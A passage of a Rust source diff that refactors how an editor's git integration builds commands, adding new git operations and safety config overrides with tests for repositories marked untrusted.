.run(&["branch", "-m", &branch, &new_name]) .await?; anyhow::Ok(()) @@ -1872,15 +1818,13 @@ impl GitRepository for RealGitRepository { .boxed() } - fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); self.executor .spawn(async move { - GitBinary::new(git_binary_path, working_directory?, executor) - .run(&["branch", "-d", &name]) + git_binary? + .run(&["branch", if is_remote { "-dr" } else { "-d" }, &name]) .await?; anyhow::Ok(()) }) @@ -1893,20 +1837,11 @@ impl GitRepository for RealGitRepository { content: Rope, line_ending: LineEnding, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - let executor = self.executor.clone(); + let git = self.git_binary(); - executor + self.executor .spawn(async move { - crate::blame::Blame::for_path( - &git_binary_path, - &working_directory?, - &path, - &content, - line_ending, - ) - .await + crate::blame::Blame::for_path(&git?, &path, &content, line_ending).await }) .boxed() } @@ -1921,11 +1856,10 @@ impl GitRepository for RealGitRepository { skip: usize, limit: Option, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; + let git = git_binary?; // Use a unique delimiter with a hardcoded UUID to separate commits // This essentially eliminates any chance of encountering the delimiter in actual commit data let commit_delimiter = @@ -1936,7 +1870,7 @@ impl GitRepository for RealGitRepository { commit_delimiter ); - let mut args = vec!["--no-optional-locks", 
"log", "--follow", &format_string]; + let mut args = vec!["log", "--follow", &format_string]; let skip_str; let limit_str; @@ -1953,9 +1887,8 @@ impl GitRepository for RealGitRepository { args.push("--"); - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(&args) + let output = git + .build_command(&args) .arg(path.as_unix_str()) .output() .await?; @@ -2000,30 +1933,17 @@ impl GitRepository for RealGitRepository { } fn diff(&self, diff: DiffType) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; + let git = git_binary?; let output = match diff { DiffType::HeadToIndex => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff", "--staged"]) - .output() - .await? - } - DiffType::HeadToWorktree => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff"]) - .output() - .await? + git.build_command(&["diff", "--staged"]).output().await? } + DiffType::HeadToWorktree => git.build_command(&["diff"]).output().await?, DiffType::MergeBase { base_ref } => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff", "--merge-base", base_ref.as_ref()]) + git.build_command(&["diff", "--merge-base", base_ref.as_ref()]) .output() .await? 
} @@ -2041,51 +1961,30 @@ impl GitRepository for RealGitRepository { fn diff_stat( &self, - diff: DiffType, - ) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + path_prefixes: &[RepoPath], + ) -> BoxFuture<'_, Result> { + let path_prefixes = path_prefixes.to_vec(); + let git_binary = self.git_binary(); + self.executor .spawn(async move { - let working_directory = working_directory?; - let output = match diff { - DiffType::HeadToIndex => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff", "--numstat", "--staged"]) - .output() - .await? - } - DiffType::HeadToWorktree => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff", "--numstat"]) - .output() - .await? - } - DiffType::MergeBase { base_ref } => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args([ - "diff", - "--numstat", - "--merge-base", - base_ref.as_ref(), - "HEAD", - ]) - .output() - .await? 
- } - }; - - anyhow::ensure!( - output.status.success(), - "Failed to run git diff --numstat:\n{}", - String::from_utf8_lossy(&output.stderr) - ); - Ok(crate::status::parse_numstat(&String::from_utf8_lossy( - &output.stdout, - ))) + let git_binary = git_binary?; + let mut args: Vec = vec![ + "diff".into(), + "--numstat".into(), + "--no-renames".into(), + "HEAD".into(), + ]; + if !path_prefixes.is_empty() { + args.push("--".into()); + args.extend( + path_prefixes + .iter() + .map(|p| p.as_std_path().to_string_lossy().into_owned()), + ); + } + let output = git_binary.run(&args).await?; + Ok(crate::status::parse_numstat(&output)) }) .boxed() } @@ -2095,15 +1994,14 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { if !paths.is_empty() { - let output = new_command(&git_binary_path) - .current_dir(&working_directory?) + let git = git_binary?; + let output = git + .build_command(&["update-index", "--add", "--remove", "--"]) .envs(env.iter()) - .args(["update-index", "--add", "--remove", "--"]) .args(paths.iter().map(|p| p.as_unix_str())) .output() .await?; @@ -2123,16 +2021,15 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { if !paths.is_empty() { - let output = new_command(&git_binary_path) - .current_dir(&working_directory?) 
+ let git = git_binary?; + let output = git + .build_command(&["reset", "--quiet", "--"]) .envs(env.iter()) - .args(["reset", "--quiet", "--"]) .args(paths.iter().map(|p| p.as_std_path())) .output() .await?; @@ -2153,19 +2050,16 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut cmd = new_command(&git_binary_path); - cmd.current_dir(&working_directory?) + let git = git_binary?; + let output = git + .build_command(&["stash", "push", "--quiet", "--include-untracked"]) .envs(env.iter()) - .args(["stash", "push", "--quiet"]) - .arg("--include-untracked"); - - cmd.args(paths.iter().map(|p| p.as_unix_str())); - - let output = cmd.output().await?; + .args(paths.iter().map(|p| p.as_unix_str())) + .output() + .await?; anyhow::ensure!( output.status.success(), @@ -2182,20 +2076,15 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut cmd = new_command(git_binary_path); + let git = git_binary?; let mut args = vec!["stash".to_string(), "pop".to_string()]; if let Some(index) = index { args.push(format!("stash@{{{}}}", index)); } - cmd.current_dir(&working_directory?) 
- .envs(env.iter()) - .args(args); - - let output = cmd.output().await?; + let output = git.build_command(&args).envs(env.iter()).output().await?; anyhow::ensure!( output.status.success(), @@ -2212,20 +2101,15 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut cmd = new_command(git_binary_path); + let git = git_binary?; let mut args = vec!["stash".to_string(), "apply".to_string()]; if let Some(index) = index { args.push(format!("stash@{{{}}}", index)); } - cmd.current_dir(&working_directory?) - .envs(env.iter()) - .args(args); - - let output = cmd.output().await?; + let output = git.build_command(&args).envs(env.iter()).output().await?; anyhow::ensure!( output.status.success(), @@ -2242,20 +2126,15 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut cmd = new_command(git_binary_path); + let git = git_binary?; let mut args = vec!["stash".to_string(), "drop".to_string()]; if let Some(index) = index { args.push(format!("stash@{{{}}}", index)); } - cmd.current_dir(&working_directory?) 
- .envs(env.iter()) - .args(args); - - let output = cmd.output().await?; + let output = git.build_command(&args).envs(env.iter()).output().await?; anyhow::ensure!( output.status.success(), @@ -2275,16 +2154,14 @@ impl GitRepository for RealGitRepository { ask_pass: AskPassDelegate, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); let executor = self.executor.clone(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. async move { - let mut cmd = new_command(git_binary_path); - cmd.current_dir(&working_directory?) - .envs(env.iter()) - .args(["commit", "--quiet", "-m"]) + let git = git_binary?; + let mut cmd = git.build_command(&["commit", "--quiet", "-m"]); + cmd.envs(env.iter()) .arg(&message.to_string()) .arg("--cleanup=strip") .arg("--no-verify") @@ -2299,6 +2176,10 @@ impl GitRepository for RealGitRepository { cmd.arg("--signoff"); } + if options.allow_empty { + cmd.arg("--allow-empty"); + } + if let Some((name, email)) = name_and_email { cmd.arg("--author").arg(&format!("{name} <{email}>")); } @@ -2310,6 +2191,39 @@ impl GitRepository for RealGitRepository { .boxed() } + fn update_ref(&self, ref_name: String, commit: String) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); + self.executor + .spawn(async move { + let args: Vec = vec!["update-ref".into(), ref_name.into(), commit.into()]; + git_binary?.run(&args).await?; + Ok(()) + }) + .boxed() + } + + fn delete_ref(&self, ref_name: String) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); + self.executor + .spawn(async move { + let args: Vec = vec!["update-ref".into(), "-d".into(), ref_name.into()]; + git_binary?.run(&args).await?; + Ok(()) + }) + .boxed() + } + + fn repair_worktrees(&self) -> BoxFuture<'_, Result<()>> { + let git_binary = 
self.git_binary(); + self.executor + .spawn(async move { + let args: Vec = vec!["worktree".into(), "repair".into()]; + git_binary?.run(&args).await?; + Ok(()) + }) + .boxed() + } + fn push( &self, branch_name: String, @@ -2321,18 +2235,25 @@ impl GitRepository for RealGitRepository { cx: AsyncApp, ) -> BoxFuture<'_, Result> { let working_directory = self.working_directory(); + let git_directory = self.path(); let executor = cx.background_executor().clone(); let git_binary_path = self.system_git_binary_path.clone(); + let is_trusted = self.is_trusted(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. async move { let git_binary_path = git_binary_path.context("git not found on $PATH, can't push")?; let working_directory = working_directory?; - let mut command = new_command(git_binary_path); + let git = GitBinary::new( + git_binary_path, + working_directory, + git_directory, + executor.clone(), + is_trusted, + ); + let mut command = git.build_command(&["push"]); command .envs(env.iter()) - .current_dir(&working_directory) - .args(["push"]) .args(options.map(|option| match option { PushOptions::SetUpstream => "--set-upstream", PushOptions::Force => "--force-with-lease", @@ -2358,17 +2279,24 @@ impl GitRepository for RealGitRepository { cx: AsyncApp, ) -> BoxFuture<'_, Result> { let working_directory = self.working_directory(); + let git_directory = self.path(); let executor = cx.background_executor().clone(); let git_binary_path = self.system_git_binary_path.clone(); + let is_trusted = self.is_trusted(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. async move { let git_binary_path = git_binary_path.context("git not found on $PATH, can't pull")?; - let mut command = new_command(git_binary_path); - command - .envs(env.iter()) - .current_dir(&working_directory?) 
- .arg("pull"); + let working_directory = working_directory?; + let git = GitBinary::new( + git_binary_path, + working_directory, + git_directory, + executor.clone(), + is_trusted, + ); + let mut command = git.build_command(&["pull"]); + command.envs(env.iter()); if rebase { command.arg("--rebase"); @@ -2393,18 +2321,26 @@ impl GitRepository for RealGitRepository { cx: AsyncApp, ) -> BoxFuture<'_, Result> { let working_directory = self.working_directory(); + let git_directory = self.path(); let remote_name = format!("{}", fetch_options); let git_binary_path = self.system_git_binary_path.clone(); let executor = cx.background_executor().clone(); + let is_trusted = self.is_trusted(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. async move { let git_binary_path = git_binary_path.context("git not found on $PATH, can't fetch")?; - let mut command = new_command(git_binary_path); + let working_directory = working_directory?; + let git = GitBinary::new( + git_binary_path, + working_directory, + git_directory, + executor.clone(), + is_trusted, + ); + let mut command = git.build_command(&["fetch", &remote_name]); command .envs(env.iter()) - .current_dir(&working_directory?) 
- .args(["fetch", &remote_name]) .stdout(Stdio::piped()) .stderr(Stdio::piped()); @@ -2414,14 +2350,12 @@ impl GitRepository for RealGitRepository { } fn get_push_remote(&self, branch: String) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["rev-parse", "--abbrev-ref"]) + let git = git_binary?; + let output = git + .build_command(&["rev-parse", "--abbrev-ref"]) .arg(format!("{branch}@{{push}}")) .output() .await?; @@ -2441,14 +2375,12 @@ impl GitRepository for RealGitRepository { } fn get_branch_remote(&self, branch: String) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["config", "--get"]) + let git = git_binary?; + let output = git + .build_command(&["config", "--get"]) .arg(format!("branch.{branch}.remote")) .output() .await?; @@ -2465,16 +2397,11 @@ impl GitRepository for RealGitRepository { } fn get_all_remotes(&self) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["remote", "-v"]) - .output() - .await?; + let git = git_binary?; + let output = git.build_command(&["remote", "-v"]).output().await?; anyhow::ensure!( output.status.success(), @@ -2523,17 +2450,12 @@ impl GitRepository for 
RealGitRepository { } fn check_for_pushed_commit(&self) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; + let git = git_binary?; let git_cmd = async |args: &[&str]| -> Result { - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(args) - .output() - .await?; + let output = git.build_command(args).output().await?; anyhow::ensure!( output.status.success(), String::from_utf8_lossy(&output.stderr).to_string() @@ -2582,14 +2504,10 @@ impl GitRepository for RealGitRepository { } fn checkpoint(&self) -> BoxFuture<'static, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let mut git = GitBinary::new(git_binary_path, working_directory.clone(), executor) - .envs(checkpoint_author_envs()); + let mut git = git_binary?.envs(checkpoint_author_envs()); git.with_temp_index(async |git| { let head_sha = git.run(&["rev-parse", "HEAD"]).await.ok(); let mut excludes = exclude_files(git).await?; @@ -2615,15 +2533,10 @@ impl GitRepository for RealGitRepository { } fn restore_checkpoint(&self, checkpoint: GitRepositoryCheckpoint) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; git.run(&[ "restore", "--source", @@ -2654,14 +2567,10 @@ impl GitRepository for RealGitRepository { 
left: GitRepositoryCheckpoint, right: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; let result = git .run(&[ "diff-tree", @@ -2692,14 +2601,10 @@ impl GitRepository for RealGitRepository { base_checkpoint: GitRepositoryCheckpoint, target_checkpoint: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; git.run(&[ "diff", "--find-renames", @@ -2716,14 +2621,10 @@ impl GitRepository for RealGitRepository { &self, include_remote_name: bool, ) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; let strip_prefix = if include_remote_name { "refs/remotes/" @@ -2773,22 +2674,23 @@ impl GitRepository for RealGitRepository { hook: RunHook, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); let repository = self.repository.clone(); - let git_binary_path = self.any_git_binary_path.clone(); - let executor = 
self.executor.clone(); let help_output = self.any_git_binary_help_output(); // Note: Do not spawn these commands on the background thread, as this causes some git hooks to hang. async move { - let working_directory = working_directory?; + let git_binary = git_binary?; + + let working_directory = git_binary.working_directory.clone(); if !help_output .await .lines() .any(|line| line.trim().starts_with("hook ")) { let hook_abs_path = repository.lock().path().join("hooks").join(hook.as_str()); - if hook_abs_path.is_file() { + if hook_abs_path.is_file() && git_binary.is_trusted { + #[allow(clippy::disallowed_methods)] let output = new_command(&hook_abs_path) .envs(env.iter()) .current_dir(&working_directory) @@ -2808,10 +2710,12 @@ impl GitRepository for RealGitRepository { return Ok(()); } - let git = GitBinary::new(git_binary_path, working_directory, executor) - .envs(HashMap::clone(&env)); - git.run(&["hook", "run", "--ignore-missing", hook.as_str()]) - .await?; + if git_binary.is_trusted { + let git_binary = git_binary.envs(HashMap::clone(&env)); + git_binary + .run(&["hook", "run", "--ignore-missing", hook.as_str()]) + .await?; + } Ok(()) } .boxed() @@ -2823,13 +2727,10 @@ impl GitRepository for RealGitRepository { log_order: LogOrder, request_tx: Sender>>, ) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); async move { - let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; // todo!: should we include no optional locks here? 
let mut git_log_command = vec![ @@ -2843,7 +2744,7 @@ impl GitRepository for RealGitRepository { git_log_command.extend(["--", file_path.as_unix_str()]); } - let mut command = git.build_command(git_log_command); + let mut command = git.build_command(&git_log_command); command.stdout(Stdio::piped()); command.stderr(Stdio::piped()); @@ -2903,40 +2804,94 @@ impl GitRepository for RealGitRepository { .boxed() } - fn commit_data_reader(&self) -> Result { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self - .working_directory() - .map_err(|_| anyhow!("no working directory"))?; - let executor = self.executor.clone(); + fn search_commits( + &self, + log_source: LogSource, + search_args: SearchCommitArgs, + request_tx: Sender, + ) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); - let (request_tx, request_rx) = smol::channel::bounded::(64); + async move { + let git = git_binary?; - let task = self.executor.spawn(async move { - if let Err(error) = - run_commit_data_reader(git_binary_path, working_directory, executor, request_rx) - .await - { - log::error!("commit data reader failed: {error:?}"); + let mut args = vec!["log", SEARCH_COMMIT_FORMAT, log_source.get_arg()?]; + + args.push("--fixed-strings"); + + if !search_args.case_sensitive { + args.push("--regexp-ignore-case"); } - }); - Ok(CommitDataReader { - request_tx, - _task: task, - }) - } -} + args.push("--grep"); + args.push(search_args.query.as_str()); -async fn run_commit_data_reader( - git_binary_path: PathBuf, - working_directory: PathBuf, - executor: BackgroundExecutor, + let mut command = git.build_command(&args); + command.stdout(Stdio::piped()); + command.stderr(Stdio::null()); + + let mut child = command.spawn()?; + let stdout = child.stdout.take().context("failed to get stdout")?; + let mut reader = BufReader::new(stdout); + + let mut line_buffer = String::new(); + + loop { + line_buffer.clear(); + let bytes_read = reader.read_line(&mut 
line_buffer).await?; + + if bytes_read == 0 { + break; + } + + let sha = line_buffer.trim_end_matches('\n'); + + if let Ok(oid) = Oid::from_str(sha) + && request_tx.send(oid).await.is_err() + { + break; + } + } + + child.status().await?; + Ok(()) + } + .boxed() + } + + fn commit_data_reader(&self) -> Result { + let git_binary = self.git_binary()?; + + let (request_tx, request_rx) = smol::channel::bounded::(64); + + let task = self.executor.spawn(async move { + if let Err(error) = run_commit_data_reader(git_binary, request_rx).await { + log::error!("commit data reader failed: {error:?}"); + } + }); + + Ok(CommitDataReader { + request_tx, + _task: task, + }) + } + + fn set_trusted(&self, trusted: bool) { + self.is_trusted + .store(trusted, std::sync::atomic::Ordering::Release); + } + + fn is_trusted(&self) -> bool { + self.is_trusted.load(std::sync::atomic::Ordering::Acquire) + } +} + +async fn run_commit_data_reader( + git: GitBinary, request_rx: smol::channel::Receiver, ) -> Result<()> { - let git = GitBinary::new(git_binary_path, working_directory, executor); let mut process = git - .build_command(["--no-optional-locks", "cat-file", "--batch"]) + .build_command(&["cat-file", "--batch"]) .stdin(Stdio::piped()) .stdout(Stdio::piped()) .stderr(Stdio::piped()) @@ -3050,18 +3005,12 @@ fn parse_initial_graph_output<'a>( fn git_status_args(path_prefixes: &[RepoPath]) -> Vec { let mut args = vec![ - OsString::from("--no-optional-locks"), OsString::from("status"), OsString::from("--porcelain=v1"), OsString::from("--untracked-files=all"), OsString::from("--no-renames"), OsString::from("-z"), ]; - args.extend( - path_prefixes - .iter() - .map(|path_prefix| path_prefix.as_std_path().into()), - ); args.extend(path_prefixes.iter().map(|path_prefix| { if path_prefix.is_empty() { Path::new(".").into() @@ -3110,26 +3059,32 @@ async fn exclude_files(git: &GitBinary) -> Result { Ok(excludes) } -struct GitBinary { +pub(crate) struct GitBinary { git_binary_path: PathBuf, 
working_directory: PathBuf, + git_directory: PathBuf, executor: BackgroundExecutor, index_file_path: Option, envs: HashMap, + is_trusted: bool, } impl GitBinary { - fn new( + pub(crate) fn new( git_binary_path: PathBuf, working_directory: PathBuf, + git_directory: PathBuf, executor: BackgroundExecutor, + is_trusted: bool, ) -> Self { Self { git_binary_path, working_directory, + git_directory, executor, index_file_path: None, envs: HashMap::default(), + is_trusted, } } @@ -3171,12 +3126,9 @@ impl GitBinary { // Copy the default index file so that Git doesn't have to rebuild the // whole index from scratch. This might fail if this is an empty repository. - smol::fs::copy( - self.working_directory.join(".git").join("index"), - &index_file_path, - ) - .await - .ok(); + smol::fs::copy(self.git_directory.join("index"), &index_file_path) + .await + .ok(); self.index_file_path = Some(index_file_path.clone()); let result = f(self).await; @@ -3190,22 +3142,16 @@ impl GitBinary { } pub async fn with_exclude_overrides(&self) -> Result { - let path = self - .working_directory - .join(".git") - .join("info") - .join("exclude"); + let path = self.git_directory.join("info").join("exclude"); GitExcludeOverride::new(path).await } fn path_for_index_id(&self, id: Uuid) -> PathBuf { - self.working_directory - .join(".git") - .join(format!("index-{}.tmp", id)) + self.git_directory.join(format!("index-{}.tmp", id)) } - pub async fn run(&self, args: impl IntoIterator) -> Result + pub async fn run(&self, args: &[S]) -> Result where S: AsRef, { @@ -3217,7 +3163,7 @@ impl GitBinary { } /// Returns the result of the command without trimming the trailing newline. - pub async fn run_raw(&self, args: impl IntoIterator) -> Result + pub async fn run_raw(&self, args: &[S]) -> Result where S: AsRef, { @@ -3234,13 +3180,33 @@ impl GitBinary { Ok(String::from_utf8(output.stdout)?) 
} - fn build_command(&self, args: impl IntoIterator) -> util::command::Command + #[allow(clippy::disallowed_methods)] + pub(crate) fn build_command(&self, args: &[S]) -> util::command::Command where S: AsRef, { let mut command = new_command(&self.git_binary_path); command.current_dir(&self.working_directory); + command.args(["-c", "core.fsmonitor=false"]); + command.arg("--no-optional-locks"); + command.arg("--no-pager"); + + if !self.is_trusted { + command.args(["-c", "core.hooksPath=/dev/null"]); + command.args(["-c", "core.sshCommand=ssh"]); + command.args(["-c", "credential.helper="]); + command.args(["-c", "protocol.ext.allow=never"]); + command.args(["-c", "diff.external="]); + } command.args(args); + + // If the `diff` command is being used, we'll want to add the + // `--no-ext-diff` flag when working on an untrusted repository, + // preventing any external diff programs from being invoked. + if !self.is_trusted && args.iter().any(|arg| arg.as_ref() == "diff") { + command.arg("--no-ext-diff"); + } + if let Some(index_file_path) = self.index_file_path.as_ref() { command.env("GIT_INDEX_FILE", index_file_path); } @@ -3489,6 +3455,8 @@ fn checkpoint_author_envs() -> HashMap { #[cfg(test)] mod tests { + use std::fs; + use super::*; use gpui::TestAppContext; @@ -3499,6 +3467,128 @@ mod tests { } } + #[gpui::test] + async fn test_build_command_untrusted_includes_both_safety_args(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + let dir = tempfile::tempdir().unwrap(); + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + false, + ); + let output = git + .build_command(&["version"]) + .output() + .await + .expect("git version should succeed"); + assert!(output.status.success()); + + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + false, + ); + let output = git + .build_command(&["config", "--get", 
"core.fsmonitor"]) + .output() + .await + .expect("git config should run"); + let stdout = String::from_utf8_lossy(&output.stdout); + assert_eq!( + stdout.trim(), + "false", + "fsmonitor should be disabled for untrusted repos" + ); + + git2::Repository::init(dir.path()).unwrap(); + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + false, + ); + let output = git + .build_command(&["config", "--get", "core.hooksPath"]) + .output() + .await + .expect("git config should run"); + let stdout = String::from_utf8_lossy(&output.stdout); + assert_eq!( + stdout.trim(), + "/dev/null", + "hooksPath should be /dev/null for untrusted repos" + ); + } + + #[gpui::test] + async fn test_build_command_trusted_only_disables_fsmonitor(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + let dir = tempfile::tempdir().unwrap(); + git2::Repository::init(dir.path()).unwrap(); + + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + true, + ); + let output = git + .build_command(&["config", "--get", "core.fsmonitor"]) + .output() + .await + .expect("git config should run"); + let stdout = String::from_utf8_lossy(&output.stdout); + assert_eq!( + stdout.trim(), + "false", + "fsmonitor should be disabled even for trusted repos" + ); + + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + true, + ); + let output = git + .build_command(&["config", "--get", "core.hooksPath"]) + .output() + .await + .expect("git config should run"); + assert!( + !output.status.success(), + "hooksPath should NOT be overridden for trusted repos" + ); + } + + #[gpui::test] + async fn test_path_for_index_id_uses_real_git_directory(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + let working_directory = PathBuf::from("/code/worktree"); + let git_directory = 
PathBuf::from("/code/repo/.git/modules/worktree"); + let git = GitBinary::new( + PathBuf::from("git"), + working_directory, + git_directory.clone(), + cx.executor(), + false, + ); + + let path = git.path_for_index_id(Uuid::nil()); + + assert_eq!( + path, + git_directory.join(format!("index-{}.tmp", Uuid::nil())) + ); + } + #[gpui::test] async fn test_checkpoint_basic(cx: &mut TestAppContext) { disable_git_global_config(); @@ -3858,7 +3948,8 @@ mod tests { assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123def"); - assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); // Multiple worktrees let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ @@ -3866,23 +3957,36 @@ mod tests { let result = parse_worktrees_from_str(input); assert_eq!(result.len(), 2); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); - assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); assert_eq!(result[1].path, PathBuf::from("/home/user/project-wt")); - assert_eq!(result[1].ref_name.as_ref(), "refs/heads/feature"); + assert_eq!(result[1].ref_name, Some("refs/heads/feature".into())); + assert!(!result[1].is_main); - // Detached HEAD entry (should be skipped since ref_name won't parse) + // Detached HEAD entry (included with ref_name: None) let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ worktree /home/user/detached\nHEAD def456\ndetached\n\n"; let result = parse_worktrees_from_str(input); - assert_eq!(result.len(), 1); + assert_eq!(result.len(), 2); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); - - // Bare repo entry (should be skipped) + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + 
